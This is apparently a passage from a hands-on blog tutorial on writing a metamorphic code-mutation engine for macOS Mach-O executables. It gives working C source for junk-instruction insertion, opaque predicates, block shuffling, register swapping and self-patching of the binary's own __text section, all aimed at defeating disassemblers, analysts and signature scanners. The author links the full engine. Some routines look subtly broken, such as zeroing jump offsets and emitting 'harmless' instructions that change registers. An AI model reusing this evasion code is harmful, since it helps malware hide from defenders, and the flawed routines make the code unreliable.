      case 0xCB: // ret
         rec_cfg_add_block(cfg, addr, end_off, true);
         return;

      case 0xE9: { // jmp rel32
         int32_t rel = (int32_t) inst.imm;
         size_t target = (rel < 0 && end_off < (size_t)(-rel)) ? 0 : end_off + rel;
         if (target < size) shit_recursive_x86_inner(code, size, cfg, target, depth + 1);
         rec_cfg_add_block(cfg, addr, end_off, false);
         return;
      }

      case 0xEB: { // jmp rel8
         int8_t rel = (int8_t) inst.imm;
         size_t target = (rel < 0 && end_off < (size_t)(-rel)) ? 0 : end_off + rel;
         if (target < size) shit_recursive_x86_inner(code, size, cfg, target, depth + 1);
         rec_cfg_add_block(cfg, addr, end_off, false);
         return;
      }

      case 0xE8: { // call rel32
         int32_t rel = (int32_t) inst.imm;
         size_t target = (rel < 0 && end_off < (size_t)(-rel)) ? 0 : end_off + rel;
         if (target < size) shit_recursive_x86_inner(code, size, cfg, target, depth + 1);
         off = end_off;
         continue; // fallthrough
      }

      default:
         if ((inst.opcode[0] & 0xF0) == 0x70 || inst.opcode[0] == 0xE3) { // jcc short
            int8_t rel = (int8_t) inst.imm;
            size_t target = (rel < 0 && end_off < (size_t)(-rel)) ? 0 : end_off + rel;
            if (target < size) shit_recursive_x86_inner(code, size, cfg, target, depth + 1);
            rec_cfg_add_block(cfg, addr, end_off, false);
            if (end_off < size) shit_recursive_x86_inner(code, size, cfg, end_off, depth + 1);
            return;
         } else if (inst.opcode[0] == 0xFF && (inst.modrm & 0x38) == 0x10) { // call [mem/reg]
            rec_cfg_add_block(cfg, addr, end_off, true);
            return;
         } else if (inst.opcode[0] == 0xFF && (inst.modrm & 0x38) == 0x20) { // jmp [mem/reg]
            rec_cfg_add_block(cfg, addr, end_off, true);
            return;
         }
      }

      off = end_off;
   }

   rec_cfg_add_block(cfg, addr, (off <= size ? off : size), true);
}

rec_flowmap * shit_recursive_x86(const uint8_t * code, size_t size) {
   if (!code || size == 0) return NULL;

   rec_flowmap * cfg = calloc(1, sizeof(rec_flowmap));
   if (!cfg) return NULL;

   cfg -> code_size = size;
   cfg -> num_blocks = 0;
   cfg -> cap_blocks = 32;
   cfg -> blocks = calloc(cfg -> cap_blocks, sizeof(rec_block_t));
   if (!cfg -> blocks) {
      free(cfg);
      return NULL;
   }

   cfg -> visited = calloc(size, sizeof(bool));
   if (!cfg -> visited) {
      free(cfg -> blocks);
      free(cfg);
      return NULL;
   }

   shit_recursive_x86_inner(code, size, cfg, 0, 0);
   return cfg;
}

void mut_with_x86(uint8_t * code, size_t size, chacha_state_t * rng, unsigned gen, muttt_t * log) {
   if (!code || size == 0) return;

   rec_flowmap * cfg = shit_recursive_x86(code, size);
   if (!cfg || cfg -> num_blocks == 0) return;

   size_t * order = malloc(cfg -> num_blocks * sizeof(size_t));
   if (!order) {
      free(cfg -> blocks);
      free(cfg -> visited);
      free(cfg);
      return;
   }
   for (size_t i = 0; i < cfg -> num_blocks; ++i) order[i] = i;
   for (size_t i = cfg -> num_blocks - 1; i > 0; --i) {
      size_t j = chacha20_random(rng) % (i + 1);
      size_t tmpi = order[i];
      order[i] = order[j];
      order[j] = tmpi;
   }

   uint8_t * tmp = malloc(size * 2);
   if (!tmp) {
      free(order);
      free(cfg -> blocks);
      free(cfg -> visited);
      free(cfg);
      return;
   }

   size_t out = 0;

   for (size_t i = 0; i < cfg -> num_blocks; ++i) {
      rec_block_t * b = & cfg -> blocks[order[i]];
      if (b -> start >= size) continue;
      size_t block_end = b -> end > size ? size : b -> end;
      size_t blen = block_end - b -> start;

      if ((chacha20_random(rng) % 4) == 0) {
         uint32_t val = chacha20_random(rng);
         size_t opq_len;
         uint8_t * opq_buf = malloc(32);
         if (!opq_buf) abort();
         forge_ghost(opq_buf, & opq_len, val, rng);
         if (out + opq_len <= size * 2) {
            memcpy(tmp + out, opq_buf, opq_len);
            if (log) drop_mut(log, out, opq_len, MUT_PRED, gen, "forge_ghost@entry");
            out += opq_len;
         }
         free(opq_buf);
      }

      if ((chacha20_random(rng) % 3) == 0) {
         size_t junk_len;
         uint8_t * junk_buf = malloc(16);
         if (!junk_buf) abort();
         spew_trash(junk_buf, & junk_len, rng);
         if (out + junk_len <= size * 2) {
            memcpy(tmp + out, junk_buf, junk_len);
            if (log) drop_mut(log, out, junk_len, MUT_JUNK, gen, "junk@entry");
            out += junk_len;
         }
         free(junk_buf);
      }

      if (out + blen <= size * 2)
         memcpy(tmp + out, code + b -> start, blen);
      else {
         blen = size * 2 - out;
         if (blen > 0) memcpy(tmp + out, code + b -> start, blen);
      }

      size_t block_offset = 0;
      while (block_offset < blen && out + block_offset < size * 2) {
         x86_inst_t inst;
         size_t avail_len = blen - block_offset;
         if (avail_len > size * 2 - (out + block_offset))
            avail_len = size * 2 - (out + block_offset);

         if (!decode_x86_withme(tmp + out + block_offset, avail_len, 0, & inst, NULL) ||
            !inst.valid || inst.len == 0) {
            block_offset++;
            continue;
         }

         size_t inst_end = block_offset + inst.len;

         if ((inst.opcode[0] == 0xE8 || inst.opcode[0] == 0xE9)) {
            if (out + block_offset + 1 + sizeof(int32_t) <= size * 2 && inst.len >= 5) {
               int32_t new_rel = 0;
               *(int32_t * )(tmp + out + block_offset + 1) = new_rel;
            }
         } else if ((inst.opcode[0] >= 0x70 && inst.opcode[0] <= 0x7F) ||
            (inst.opcode[0] == 0x0F && inst.opcode_len > 1 && inst.opcode[1] >= 0x80 && inst.opcode[1] <= 0x8F)) {
            if (out + block_offset + 2 <= size * 2) tmp[out + block_offset + 1] = 0;
         }

         block_offset += inst.len;
      }

      out += blen;

      if ((chacha20_random(rng) % 4) == 0) {
         uint32_t val = chacha20_random(rng);
         size_t opq_len;
         uint8_t * opq_buf = malloc(32);
         if (!opq_buf) abort();
         forge_ghost(opq_buf, & opq_len, val, rng);
         if (out + opq_len <= size * 2) {
            memcpy(tmp + out, opq_buf, opq_len);
            if (log) drop_mut(log, out, opq_len, MUT_PRED, gen, "forge_ghost@exit");
            out += opq_len;
         }
         free(opq_buf);
      }

      if ((chacha20_random(rng) % 3) == 0) {
         size_t junk_len;
         uint8_t * junk_buf = malloc(16);
         if (!junk_buf) abort();
         spew_trash(junk_buf, & junk_len, rng);
         if (out + junk_len <= size * 2) {
            memcpy(tmp + out, junk_buf, junk_len);
            if (log) drop_mut(log, out, junk_len, MUT_JUNK, gen, "junk@exit");
            out += junk_len;
         }
         free(junk_buf);
      }

      if ((chacha20_random(rng) % 6) == 0) {
         size_t fake_len = 4 + (chacha20_random(rng) % 8);
         if (out + fake_len <= size * 2) {
            uint8_t * fake = malloc(fake_len);
            if (!fake) abort();
            for (size_t k = 0; k < fake_len;) {
               size_t junk_len;
               uint8_t * junk_buf = malloc(16);
               if (!junk_buf) abort();
               spew_trash(junk_buf, & junk_len, rng);
               size_t to_copy = (k + junk_len > fake_len) ? fake_len - k : junk_len;
               memcpy(fake + k, junk_buf, to_copy);
               k += to_copy;
               free(junk_buf);
            }
            memcpy(tmp + out, fake, fake_len);
            if (log) drop_mut(log, out, fake_len, MUT_DEAD, gen, "fake block");
            out += fake_len;
            free(fake);
         }
      }
   }

   if ((chacha20_random(rng) % 3) == 0 && out + 32 <= size * 2) {
      uint32_t val = chacha20_random(rng);
      size_t opq_len;
      uint8_t * opq_buf = malloc(32);
      if (!opq_buf) abort();
      forge_ghost(opq_buf, & opq_len, val, rng);
      memmove(tmp + opq_len, tmp, out);
      memcpy(tmp, opq_buf, opq_len);
      free(opq_buf);
      out += opq_len;
   }

   size_t copy_len = out > size ? size : out;
   memcpy(code, tmp, copy_len);
   if (copy_len < size) memset(code + copy_len, 0, size - copy_len);

   free(tmp);
   free(order);
   free(cfg -> blocks);
   free(cfg -> visited);
   free(cfg);
}

The implementation’s dead simple we do a local, forward-looking liveness analysis. No full CFG needed for this. Just scan instructions in order, keeping track of the state for each register.

To keep things simple, we mark volatile regs like rax and rcx as “potentially live” since they’re often used for return values and function args. Then we slap together a simple function to update the liveness state after each instruction. It follows basic rules:

If an instruction writes to a register (like MOV REG, ... or ADD REG, ...), we mark that reg as live and log the current offset as its definition point basically killing whatever was there before.

If an instruction reads from a register, we log the current offset as the last use of that reg’s current value.

void pulse_live(liveness_state_t *state, size_t offset, const x86_inst_t *inst) {
    // MOV r/m32, r32 (Opcode 0x89)
    // Write to r/m32, Read from r32
    if (inst->opcode[0] == 0x89 && inst->has_modrm) {
    // The register being read from
        uint8_t src_reg = modrm_reg(inst->modrm);  
        // The register being written to
        uint8_t dst_reg = modrm_rm(inst->modrm);   

        // use of the source reg. Record that we just used its value.
        state->regs[src_reg].last_use = offset;

        // the dst reg.
        // we are writing a new value to it. Mark it live and record where.
        state->regs[dst_reg].iz_live = true;
        state->regs[dst_reg].def_offset = offset;
    }
    // ... 
}

Then we can use this to ask can I safely swap reg x with y at this point in the code?

uint8_t jack_reg(const liveness_state_t *state, uint8_t original_reg, size_t current_offset, chacha_state_t *rng) {
    // Never touch RSP/RBP
    if (original_reg == 4 || original_reg == 5) return original_reg;

    uint8_t candidates[8];
    uint8_t num_candidates = 0;

    for (uint8_t test_reg = 0; test_reg < 8; test_reg++) {
        if (test_reg == original_reg || test_reg == 4 || test_reg == 5) continue;

        if (!state->regs[test_reg].iz_live) {
            // reg is completely free and unused.
            candidates[num_candidates++] = test_reg;
        } else {
            // reg is live, but maybe its value is old and unused?
            size_t age = current_offset - state->regs[test_reg].def_offset;
            if (age > 32) { // more than 32 bytes ago, risk it.
                candidates[num_candidates++] = test_reg;
            }
        }
    }
    return (num_candidates > 0) ? candidates[chacha20_random(rng) % num_candidates] : original_reg;
}

First, we disqualify critical regs that should never be touched RSP for the stack pointer, RBP for the frame pointer… Then we collect a list of candidate regs that are not live right now. These are values that aren’t needed anymore, so using them is safe.

If no free regs pop up, we loosen the rules a bit. We look for regs that are live but were defined ages ago (measured by the offset from their def_offset to the current_offset). The idea if a value hasn’t been used in a while, it’s probably read to overwrite. and finally, we pick a random candidate from the safe list. If nothing fits, we just stick with the original register better safe than broken.

Without this, you can easily overwrite a register that’s still holding a loop counter, grab a reg that’s about to be used as a function argument, or just mess up a calculation by swapping source and destination wrong. It’s super simple, but we catch no fade.

Smart Trash

At this stage, the code’s clean, and now the goal is to sprinkle in something that poisons the disassembly landscape that’s junk code. But we’re not adding extra instructions that slow the program; we call it smart trash. The bytes have to decode as legal instructions invalid ones would either crash the CPU or be filtered out.

They can’t mess with the program’s architectural state (registers, memory, flags) but should look like they belong, making it tough for an analyst to separate signal from noise. And of course, they gotta come in all shapes and sizes so we don’t create a new, obvious pattern.

References : “Smart” trash: building of logic By pr0mix

How it works ?

We try to steer clear of RSP and RBP messing with the stack or frame pointer is basically a guaranteed crash. We stick to general-purpose regs and then drop in the official multi-byte NOPs (0F 1F /0) Perfect junk: CPUs run them fast, and they show up all the time in compiler-generated code for alignment, so they look totally legit.

something like:

void spew_trash(uint8_t * buf, size_t * len, chacha_state_t * rng) {
  if (!buf || !len) return;

  const uint8_t usable_regs[] = {0,1,2,3,8,9,10,11,12,13,14,15};
  size_t reg_count = sizeof(usable_regs) / sizeof(usable_regs[0]);

  uint8_t r1 = usable_regs[chacha20_random(rng) % reg_count];
  uint8_t r2;
  do {
    r2 = usable_regs[chacha20_random(rng) % reg_count];
  } while (r2 == r1);

  uint8_t choice = chacha20_random(rng) % 20;

  switch (choice) {
  case 0:
    buf[0] = 0x90;* len = 1;
    break;
  case 1:
    buf[0] = 0x66;
    buf[1] = 0x90;* len = 2;
    break;
  case 2:
    buf[0] = 0x48;
    buf[1] = 0x89;
    buf[2] = 0xC0 | (r1 << 3) | r2;* len = 3;
    break;
  case 3:
    buf[0] = 0x48;
    buf[1] = 0x31;
    buf[2] = 0xC0 | (r1 << 3) | r1;* len = 3;
    break;
  case 4:
    buf[0] = 0x48;
    buf[1] = 0x8D;
    buf[2] = 0x40 | r1;
    buf[3] = 0x00;* len = 4;
    break;
  case 5:
    buf[0] = 0x48;
    buf[1] = 0x83;
    buf[2] = 0xC0 | r1;
    buf[3] = 0x00;* len = 4;
    break;
  case 6:
    buf[0] = 0x48;
    buf[1] = 0x83;
    buf[2] = 0xE8;
    buf[3] = r1;* len = 4;
    break;
  case 7:
    if (r1 < 8) {
      buf[0] = 0x50 | r1;
      buf[1] = 0x58 | r1;* len = 2;
    } else {
      buf[0] = 0x90;* len = 1;
    }
    break;
  case 8:
    buf[0] = 0x48;
    buf[1] = 0x85;
    buf[2] = 0xC0 | (r1 << 3) | r1;* len = 3;
    break;
  case 9:
    buf[0] = 0x48;
    buf[1] = 0x39;
    buf[2] = 0xC0 | (r1 << 3) | r1;* len = 3;
    break;
  case 10:
    buf[0] = 0x48;
    buf[1] = 0x09;
    buf[2] = 0xC0 | (r1 << 3) | r1;* len = 3;
    break;
  case 11:
    buf[0] = 0x48;
    buf[1] = 0x21;
    buf[2] = 0xC0 | (r1 << 3) | r1;* len = 3;
    break;
  case 12:
    buf[0] = 0x48;
    buf[1] = 0x87;
    buf[2] = 0xC0 | (r1 << 3) | r1;* len = 3;
    break;
  case 13:
    buf[0] = 0x0F;
    buf[1] = 0x1F;
    buf[2] = 0x00;* len = 3;
    break;
  case 14:
    buf[0] = 0x0F;
    buf[1] = 0x1F;
    buf[2] = 0x40;
    buf[3] = 0x00;* len = 4;
    break;
  case 15:
    buf[0] = 0x48;
    buf[1] = 0x89;
    buf[2] = 0xC0 | (r1 << 3) | r2;* len = 3;
    break;
  case 16:
    buf[0] = 0x48;
    buf[1] = 0x31;
    buf[2] = 0xC0 | (r1 << 3) | r2;* len = 3;
    break;
  case 17:
    buf[0] = 0x48;
    buf[1] = 0x01;
    buf[2] = 0xC0 | (r2 << 3) | r1;* len = 3;
    break;
  case 18:
    buf[0] = 0x48;
    buf[1] = 0x29;
    buf[2] = 0xC0 | (r2 << 3) | r1;* len = 3;
    break;
  case 19:
    buf[0] = 0x0F;
    buf[1] = 0x1F;
    buf[2] = 0x40 | (chacha20_random(rng) % 8);
    buf[3] = 0x00;* len = 4;
    break;
  }
}

We can’t just spit out random bytes, we need valid, legal x64 instructions. Stuff like 0x48 0x89 0xC0 decodes to MOV RAX, RAX. Totally useless, but it forces any disassembler to parse it, wasting CPU cycles.

For the full, cases 0, 1, 13, 14, and 19 drop multi-byte NOPs 0x0F 0x1F. MOV, TEST (CMP is riskier), and LEA are basically the bread and butter of compiled code. Seeing them out of context isn’t suspicious they’re just normal code patterns, making it tough for an analyst to separate junk from the real stuff.

So basically, we crank out junk of different lengths 1, 2, 3, 4 bytes … to fuck up linear sweep disassemblers. If a disassembler decodes a 2-byte junk NOP, it’ll start reading the next real instruction from the wrong spot. By mixing up registers from the usable_regs list, we make sure the junk doesn’t form a simple, recognizable pattern. If we always used RAX, it’d be way easier to spot and filter.

What else can we do? We can make the junk code look like a function prologue. The disassembler might think it’s a new function entry and spawn a “ghost function” that doesn’t actually exist. Or we can sneak in a conditional jump (JZ) that always skips a junk block. The disassembler, clueless that the jump’s always taken, will try to parse the junk as real code and get totally lost. Carry on, wayward son.

To nail this, the main target for junk is the padding between basic blocks or at the ends of sections. The CFG tells us where blocks finish. We use the CFG and disassembly info to find stretches of 0x00 or 0x90 bytes that aren’t part of any instruction perfect spots to drop junk without fuckin’ up the runtime.

We never stick junk in the middle of an instruction. The CFG plus decoded instruction lengths give us exact boundaries, so we can inject junk between instructions It goes into areas off the exec spot like padding or right after a JMP that skips over it.

Another trick we can throw in while we’re at it is opaque predicates conditional branches where the outcome is known to us at build time, but a static analyzer can’t easily figure it out. Basically, we’re faking control flow.

We do this by inserting a branch that always goes the same way, but the condition is some convoluted or tautological expression that static analysis struggles to simplify.

    mov    eax, 1
    test   eax, eax    ; ZF is always 0, so JZ is never taken
    jz     .trash_block ; This branch is never taken at runtime
  .our_routine:
    ; ... code here ...
    jmp    .continue
  .trash_block:         ; This block is never executed
    ; ... bytes that decode as junk instructions ...
  .continue:

We can generates these predicate sequences dynamically, using the RNG to choose from a variety of identities and tautologies, making the false paths unique and resilient to pattern matching.

__attribute__((always_inline)) inline void forge_ghost(uint8_t * buf, size_t * len, uint32_t value, chacha_state_t * rng) {
   uint8_t reg1 = chacha20_random(rng) % 8;
   uint8_t reg2 = chacha20_random(rng) % 8;
   uint8_t reg3 = chacha20_random(rng) % 8;
   while (reg2 == reg1) reg2 = chacha20_random(rng) % 8;
   while (reg3 == reg1 || reg3 == reg2) reg3 = chacha20_random(rng) % 8;

   switch (chacha20_random(rng) % 8) {
   case 0: {
      buf[0] = 0x48;
      buf[1] = 0x31;
      buf[2] = 0xC0 | (reg1 << 3) | reg1;
      buf[3] = 0x48;
      buf[4] = 0x85;
      buf[5] = 0xC0 | (reg1 << 3) | reg1;
      buf[6] = 0x0F;
      buf[7] = 0x84;
      uint8_t payload_len = 4;
      write_rel32(buf + 8, (int32_t) payload_len); /* jump overnover */
      buf[12] = 0x48;
      buf[13] = 0x83;
      buf[14] = 0xC0 | reg1;
      buf[15] = 0x00;
      * len = 12 + payload_len;
      break;
   }
   case 1: {
      buf[0] = 0x48;
      buf[1] = 0x89;
      buf[2] = 0xC0 | (reg2 << 3) | reg1;
      buf[3] = 0x48;
      buf[4] = 0x31;
      buf[5] = 0xC0 | (reg2 << 3) | reg2;
      buf[6] = 0x48;
      buf[7] = 0x85;
      buf[8] = 0xC0 | (reg2 << 3) | reg2;
      buf[9] = 0x0F;
      buf[10] = 0x85;
      uint8_t payload_len = 6;
      write_rel32(buf + 11, (int32_t) payload_len);
      buf[15] = 0x68;
      write_u32(buf + 16, chacha20_random(rng));
      buf[20] = (uint8_t)(0x58 + reg2);
      * len = 11 + payload_len;
      break;
   }
   case 2: {
      /* LEA + CMP + JE */
      buf[0] = 0x48;
      buf[1] = 0x8D;
      buf[2] = 0x00 | (reg1 << 3) | reg1;
      buf[3] = 0x48;
      buf[4] = 0x39;
      buf[5] = 0xC0 | (reg1 << 3) | reg1;
      buf[6] = 0x0F;
      buf[7] = 0x84;
      uint8_t payload_len = 4;
      write_rel32(buf + 8, (int32_t) payload_len);
      buf[12] = 0x90;
      buf[13] = 0x90;
      buf[14] = 0x90;
      buf[15] = 0x90;
      * len = 12 + payload_len;
      break;
   }
   case 3: {
      /* SUB + TEST + JZ */
      buf[0] = 0x48;
      buf[1] = 0x29;
      buf[2] = 0xC0 | (reg1 << 3) | reg1;
      buf[3] = 0x48;
      buf[4] = 0x85;
      buf[5] = 0xC0 | (reg1 << 3) | reg1;
      buf[6] = 0x0F;
      buf[7] = 0x84;
      uint8_t payload_len = 4;
      write_rel32(buf + 8, (int32_t) payload_len);
      buf[12] = 0x90;
      buf[13] = 0x90;
      buf[14] = 0x90;
      buf[15] = 0x90;
      * len = 12 + payload_len;
      break;
   }
   case 4: {
      buf[0] = 0x48;
      buf[1] = 0x83;
      buf[2] = 0xE0 | reg1;
      buf[3] = 0x00;
      buf[4] = 0x48;
      buf[5] = 0x85;
      buf[6] = 0xC0 | (reg1 << 3) | reg1;
      buf[7] = 0x0F;
      buf[8] = 0x84;
      uint8_t payload_len = 5;
      write_rel32(buf + 9, (int32_t) payload_len);
      buf[13] = 0x48;
      buf[14] = 0x87;
      buf[15] = 0xC0 | (reg1 << 3) | reg3;
      buf[16] = 0x48;
      buf[17] = 0x87;
      buf[18] = 0xC0 | (reg1 << 3) | reg3;
      * len = 9 + payload_len;
      break;
   }
   case 5: {
      /* PUSH + POP + TEST + JZ */
      buf[0] = (uint8_t)(0x50 | reg1);
      buf[1] = (uint8_t)(0x58 | reg1);
      buf[2] = 0x48;
      buf[3] = 0x85;
      buf[4] = 0xC0 | (reg1 << 3) | reg1;
      buf[5] = 0x0F;
      buf[6] = 0x84;
      uint8_t payload_len = 4;
      write_rel32(buf + 7, (int32_t) payload_len);
      buf[11] = 0x90;
      buf[12] = 0x90;
      buf[13] = 0x90;
      buf[14] = 0x90;
      * len = 11 + payload_len;
      break;
   }
   case 6: {
      /* XCHG + TEST + JZ */
      buf[0] = 0x48;
      buf[1] = 0x87;
      buf[2] = 0xC0 | (reg1 << 3) | reg1;
      buf[3] = 0x48;
      buf[4] = 0x85;
      buf[5] = 0xC0 | (reg1 << 3) | reg1;
      buf[6] = 0x0F;
      buf[7] = 0x84;
      uint8_t payload_len = 4;
      write_rel32(buf + 8, (int32_t) payload_len);
      buf[12] = 0x90;
      buf[13] = 0x90;
      buf[14] = 0x90;
      buf[15] = 0x90;
      * len = 12 + payload_len;
      break;
   }
   default: {
      buf[0] = 0x48;
      buf[1] = 0x83;
      buf[2] = 0xC0 | reg1;
      buf[3] = 0x00;
      buf[4] = 0x48;
      buf[5] = 0x83;
      buf[6] = 0xE8 | reg1;
      buf[7] = 0x00;
      buf[8] = 0x48;
      buf[9] = 0x85;
      buf[10] = 0xC0 | (reg1 << 3) | reg1;
      buf[11] = 0x0F;
      buf[12] = 0x84;
      uint8_t payload_len = 5;
      write_rel32(buf + 13, (int32_t) payload_len);
      uint32_t imm = chacha20_random(rng);
      buf[17] = 0x68;
      write_u32(buf + 18, imm);
      buf[22] = (uint8_t)(0x58 + reg2);
      * len = 13 + payload_len;
      break;
   }
   }
}

It’s pretty obvious at first glance Picks 3 different registers (reg1, reg2, reg3) to use in instructions and make sure the code looks different each time because the registers vary.

Then chooses one of 8 predefined instruction sequences cause each sequence has Arithmetic or logical operation on a register, A test of the register and defiantly a conditional jump JZ, JE, JNZ .. once that done Instructions are written byte by byte into the buffer buf.

XOR reg1, reg1 > sets reg1 to 0
TEST reg1, reg1 > updates flags based on reg1 (always 0 here)
JZ rel32 > always jumps, because zero flag is set
write_rel32 writes the jump offset so the CPU skips the “payload” or next instructions.

then decides how far the jump goes, Some cases push and pop values, swap registers, or use immediate random values to confuse static analysis. and cause the registers and instructions are randomly chosen, each generated snippet is functionally the same but looks different in memory.

I’m keeping things simple here and obviously not explaining every detail, but you can always grab the engine itself at >https://github.com/0xf00sec/Aether/blob/main/src/engine.c and check it out yourself.

So far, here’s what we’ve pulled off, in theory:

Foundation: mess with how instructions look register swaps, opcode flips.
Structure: mess with how instructions are laid out junk insertion, block shuffling.
Logic: mess with how the program flows opaque predicates, control-flow flattening.
Patterns: mess with the signatures everyone scans for prologue obfuscation.
Execution: mess with the order of ops instruction scheduling.

Who Mutates the Mutator?

The mutation engine is itself just code in the __text section. So, when the engine runs and overwrites the __text section… it is overwriting itself

That’s how it usually goes with a standard macOS app the code lives locked up in the __TEXT segment of the Mach-O. To mess with it, we need routines that let the program find, read, and eventually patch its own code in the binary we call that Mach-O parsing.

Every Mach-O file has a header, load commands, and segments (like __TEXT for code and __DATA for data):

__TEXT segment
- __stubs section
- __stub_helper section
- __cstring section
- __unwind_info section
__DATA segment
- __nl_symbol_ptr section
- __la_symbol_ptr section

+-----------------------------------------------------+
|                   Mach-O File                       |
+-----------------------------------------------------+
| Header                                              |
|  - Magic number, CPU type, file type, etc.          |
+-----------------------------------------------------+
| Load Commands                                       |
|  - Define segments (e.g., __TEXT, __DATA)           |
+-----------------------------------------------------+
| Segments                                            |
|  +-------------------+    +-----------------------+ |
|  |     __TEXT        |    |       __DATA          | |
|  |  (Code section)   |    |      (data zone)      | |
|  +-------------------+    +-----------------------+ |
+-----------------------------------------------------+

The Mach-O header and load commands define how the file is mapped into memory. The __TEXT segment holds executable code and read-only data, including stubs, helpers, and constants used at runtime. It is mostly read-only to protect the program logic. The __DATA segment is writable and stores runtime-modifiable data, such as global variables, pointers, symbol tables, and other mutable structures.

Basically, we, figure out where the binary is loaded in memory (ASLR included) Pinpoint the exact location and size of the executable code (__text) both in memory and on disk. and somehow convert between virtual addresses (where the code runs) and file offsets (where it sits on disk).

Let’s start with how to calculate the random offset the “slide” that the kernel’s ASLR throws on the binary. This is the foundation: every memory address we touch afterward needs to be adjusted by this number. We need an address of the binary by using a known function within the binary itself we relay on dladdr It is a library function that exists on both macOS and Linux, and helps locate the image (shared object or executable) containing a given address. See: dladdr(3)

After parsing the Mach-O headers to grab the original virtual address of the __TEXT segment, the slide is just the diff between that and the actual load address. To lock down the exact file offsets and memory bounds of the __text section (the real executable code), we walk through all LC_SEGMENT_64 entries and their sections, hunt for __text inside __TEXT, and return the critical spots where it starts on disk, where it ends, and where it lives in memory (adjusted by the slide).

bool text_sec(const struct mach_header_64 * hdr, text_section_t * out) {
   if (!hdr || !out) return false;
   memset(out, 0, sizeof( * out));

   intptr_t slide = img_slide(hdr);
   struct load_command * lc = (struct load_command * )((uint8_t * ) hdr + sizeof( * hdr));

   for (uint32_t i = 0; i < hdr -> ncmds && i < 0xFFFF; i++) {
      if (!lc || lc -> cmdsize == 0 || lc -> cmdsize > UINT32_MAX / 2) break;

      if (lc -> cmd == LC_SEGMENT_64) {
         struct segment_command_64 * seg = (struct segment_command_64 * ) lc;
         struct section_64 * sec = (struct section_64 * )((uint8_t * ) seg + sizeof( * seg));

         for (uint32_t j = 0; j < seg -> nsects && j < 0xFFFF; j++) {
            if (strncmp(sec[j].sectname, "__text", 16) == 0 &&
               strncmp(sec[j].segname, "__TEXT", 16) == 0) {

               out -> file_start = sec[j].offset;
               out -> file_end = sec[j].offset + sec[j].size;
               out -> vm_start = sec[j].addr + slide;
               out -> vm_end = out -> vm_start + sec[j].size;
               return true;
            }
         }
      }

      lc = (struct load_command * )((uint8_t * ) lc + lc -> cmdsize);
   }

   return false;
}

Next up, we need to translate any runtime virtual address (say, a function pointer) back to its byte offset in the binary. That’s key for knowing what part of the file to patch. The move is the same: walk all the segments, check if the given VA lands inside a segment’s memory range (adjusted by the slide). If it does, compute the offset into that segment and add the segment’s file offset that gives you the exact byte position in the file.

uint64_t vmoffst(const struct mach_header_64 * hdr, uint64_t addr) {
   if (!hdr) return INVALID_OFFSET;

   intptr_t slide = img_slide(hdr);
   struct load_command * lc = (struct load_command * )((uint8_t * ) hdr + sizeof( * hdr));

   for (uint32_t i = 0; i < hdr -> ncmds; i++) {
      if (lc -> cmd == LC_SEGMENT_64) {
         struct segment_command_64 * seg = (struct segment_command_64 * ) lc;
         if (seg -> vmsize == 0) {
            lc = (struct load_command * )((uint8_t * ) lc + lc -> cmdsize);
            continue;
         }

         uint64_t seg_start = seg -> vmaddr + slide;
         uint64_t seg_end = seg_start + seg -> vmsize;

         if (addr >= seg_start && addr < seg_end) {
            uint64_t offset_into_seg = addr - seg_start;
            if (seg -> fileoff > UINT64_MAX - offset_into_seg) 
            return INVALID_OFFSET;
            return seg -> fileoff + offset_into_seg;
         }
      }
      lc = (struct load_command * )((uint8_t * ) lc + lc -> cmdsize);
   }
   return INVALID_OFFSET;
}

So how this clicks the piece loads at some random address. slide gives us that offset

segment __PAGEZERO: vmaddr 0x0 - 0x100000000, fileoff 0x0
segment __TEXT: vmaddr 0x100000000 - 0x100088000, fileoff 0x0
segment __DATA_CONST: vmaddr 0x100088000 - 0x10008c000, fileoff 0x88000
segment __DATA: vmaddr 0x10008c000 - 0x1000a4000, fileoff 0x8c000
segment __LINKEDIT: vmaddr 0x1000a4000 - 0x1000a8000, fileoff 0xa4000
hook at 0x103354e30 outside main __TEXT, skipping
hook at 0x103354f70 outside main __TEXT, skipping

From there, we reuse that file offset + size to read the original code into a mutable buffer. We can also grab a runtime address, like malloc, then run vmoffst(malloc_address) to map it back into the file and mark that region protected so the engine doesn’t wreck it.

After each mutation, we just take the original file offset from text seg and write the whole mutated buffer back into the binary, simply overwriting its own code and breaking code signing in the process.

Remember I said cons more then pros, so… also there’s a higher chance macOS won’t let the app launch normally afterward. you can try _DATA me? I don’t give a fuck. Now what left is just tying it all together calling the engine with the right params deciding what to mutate, what’s not.

Let’s throw the mutator on the test bench. The plan’s simple let it tweak the executable’s code, then use Capstone to disassemble both the original and mutated instructions to see exactly what changed. Basically, checking if we survived the theory phase.

void show_inst_changes(const uint8_t * before,
   const uint8_t * after, size_t len, uintptr_t base) {
   csh handle;
   cs_insn * insn1, * insn2;
   size_t count1, count2;

   if (cs_open(CS_ARCH_X86, CS_MODE_64, & handle) != CS_ERR_OK) return;

   count1 = cs_disasm(handle, before, len, base, 1, & insn1);
   count2 = cs_disasm(handle, after, len, base, 1, & insn2);

   if (count1 > 0 && count2 > 0) {
      if (strcmp(insn1 -> mnemonic, insn2 -> mnemonic) != 0 ||
         strcmp(insn1 -> op_str, insn2 -> op_str) != 0) {
         dprintf(1, "@0x%lx: %s %s  ->  %s %s\n",
            base,
            insn1 -> mnemonic, insn1 -> op_str,
            insn2 -> mnemonic, insn2 -> op_str);
      }
   }

   cs_free(insn1, count1);
   cs_free(insn2, count2);
   cs_close( & handle);
}

void dump_meta_diff(const uint8_t * before,
   const uint8_t * after, size_t size, uintptr_t base) {
   for (size_t i = 0; i < size;) {
      if (before[i] != after[i]) {
         size_t chunk = 16; // enough to capture one instruction
         show_inst_changes(before + i, after + i, chunk, base + i);
      }
      i++;
   }
}

It’s a simple function’s opens a Capstone handle with cs_open(CS_ARCH_X86, CS_MODE_64, &handle), disassembles one instruction from the before and after buffers using cs_disasm, then compares the mnemonic and operands. Later, it just prints out any differences.

Why Capstone? It’s way more versatile than the decoder we slapped together earlier, handles tons of edge cases, and honestly, I use it all the time. Super easy to integrate, and a great tool to check out the mutator from a reverser’s perspective. > http://www.capstone-engine.org

We’re gonna grab the mutator’s output with Capstone and dump it to dump.txt. Since this can get huge multiple generations, up to 5 runs I wrote a simple script to slice through it. Makes it easy to process and actually understand the instruction-level changes without drowning in data.

and here’s what got, These dumps are basically a post-mortem of the code buffer after the engine worked its magic a snapshot of the engine’s output. :

~/main > python3 dumber.py
Total instructions: 3522
Unique originals: 1458
Mutated instructions: 3522

Most mutated originals:
cmp ecx, 0: 182
xor eax, dword ptr [rax]: 91
adc eax, dword ptr [rax]: 84
ror byte ptr [rax - 0x73], 0x3d: 74
